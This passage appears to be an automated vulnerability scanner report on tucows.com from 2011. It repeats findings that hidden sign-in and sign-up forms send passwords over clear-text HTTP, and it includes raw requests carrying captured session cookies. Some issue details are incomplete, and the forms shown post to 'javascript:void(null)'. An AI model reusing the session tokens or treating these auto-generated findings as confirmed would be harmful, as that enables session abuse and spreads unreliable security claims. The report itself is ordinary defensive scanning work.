GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.40. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.41. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.42. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.43. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.44. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.45. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.46. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.47. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.48. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.49. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.50. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.51. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
